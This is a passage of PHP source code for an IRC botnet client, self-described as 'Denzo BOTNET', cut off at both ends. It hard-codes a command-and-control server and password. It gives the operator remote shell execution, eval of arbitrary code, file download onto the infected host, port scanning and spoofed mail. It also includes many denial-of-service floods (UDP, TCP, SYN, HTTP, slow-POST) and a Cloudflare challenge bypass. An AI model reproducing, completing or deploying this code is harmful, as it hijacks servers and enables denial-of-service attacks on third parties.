"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
);
var $config = array("server"=>"91.134.216.27",
"port"=>"6667",
"pass"=>"",
"prefix"=>"",
"maxrand"=>"7",
"chan"=>"#MiasmaSecurityTeam",
"chan2"=>"#MiasmaSecurityTeam",
"key"=>"",
"modes"=>"+ps",
"password"=>"MiasmaSec",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost takapusi.cok)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"#-> \2Denzo Bot Status : Online and connected \2 <-# ");
$this->privmsg($this->config['chan2'],"#-> \2Denzo BOTNET By DenzelHax 2019\2 <-# ");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: welcome $nick we missed you.");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: Wrong password $nick please check your line 49 in uploaded phpbot");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@jatimcom.cok>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#[email protected] since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <[email protected]>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "botvuln":
case "vuln":
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: #-> phpbot of Denzo BOTNET coded by Denzel <-#");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // -pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT : $nick Closed connection");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick Ndang Cewok Lek Wes Mari!!!!");
break;
case "jsbypassflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: jsbypassflood host port time [method] [url] [postFields]");
}
break;
case "masshttpv2":
if(count($mcmd)>2)
{
$this->HTTP_Flood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttpv2 host page length");
}
break;
case "massudpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudpflood host packet time");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "massudp":
if (count($mcmd) > 4) {
$this->udpfloodv2($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudp host port time packetsize");
}
break;
case "masshttp":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttp host port time [method] [url]");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
public function set_nick() {
$fp = fsockopen("freegeoip.app", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[BR]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.app/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[BR]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
$nicky=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
$this->nick1 = $nicky[rand(0,count($nicky) - 1)];
$this->nick2 = $nicky[rand(0,count($nicky) - 1)];
$this->nick3 = $nicky[rand(0,count($nicky) - 1)];
$this->nick4 = $nicky[rand(0,count($nicky) - 1)];
$this->nick5 = $nicky[rand(0,count($nicky) - 1)];
$this->nick6 = $nicky[rand(0,count($nicky) - 1)];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->send("NICK " . $this->nick);
$this->send("NICK ".$this->nick.$this->nick1.$this->nick2.$this->nick3.$this->nick4.$this->nick5.$this->nick6."");
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"\2[\2DENZO BOTNET | * UDPFLOOD ATACAR EM CURSO SOBRE: $host !!!\2]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | $env MB enviados / Media: $vel mbp/s launch\2]\2");
}
//////////// Rudy Flood Added by Hax Stroke
function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2Rudy Flood Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Rudy Flood Finished!\2]");
}
function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JS-BYPASS ATTACKING $host:$port FOR $time WITH $method METHOD ON THE $url PATH !!!\2]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare Detected !\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2JSBYPASS METHOD BY DENZELHAX ATTACKING !\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JSBYPASS STOPPING ON $host !!!\2]\2");
}
////////////
//////////// UDP FLOOD VERSION 2.0 ADDED BY HAX STROKE
function udpfloodv2($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | * MASSUDP ATACAR EM CURSO SOBRE: $host:$port !!!\2]\2");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "04Ataque Finalizado Com Sucesso!");
}
////////////
function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
/////////////
function HTTP_Flood( $host , $page , $length )
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing $host on $page path with $length lenght - Disconnected...]\2");
if ( $page == '' )
{
$page = '/';
}
$max_time = time() + $length;
$packet .= 'GET ' . $page . ' HTTP/1.1' . "\r\n";
$packet .= 'Host: ' . $host . "\r\n";
$packet .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0b7) Gecko/20100101 Firefox/4.0b7' . "\r\n";
$packet .= 'Keep-alive: 300' . "\r\n";
$packet .= 'Connection: keep-alive' . "\r\n\r\n";
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
while( 1 )
{
if ( time() > $max_time )
{
break;
}
if( $fp )
{
fwrite( $fp , $packet );
fclose( $fp );
$packets++;
}
else
{
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
}
}
if ( $packets == 0 )
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],'<br /><b>An error occurred! Could not send packets.</b><br />' . "\n");
}
else
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],$host) ;
$this->privmsg($this->config['chan'],$length) ;
$this->privmsg($this->config['chan'],'<b>Packets:</b> ' . round($packets) . ' ( ' . round($packets/$length) . ' packets/s ) <br />' . "\n");
}
return 0;
}
////////////
function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
////////////
function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Killing $host:$port for $time - Disconnected...]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Finished ! - Connected...]\2");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing TCP Connection $host:$port - Disconnected...]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
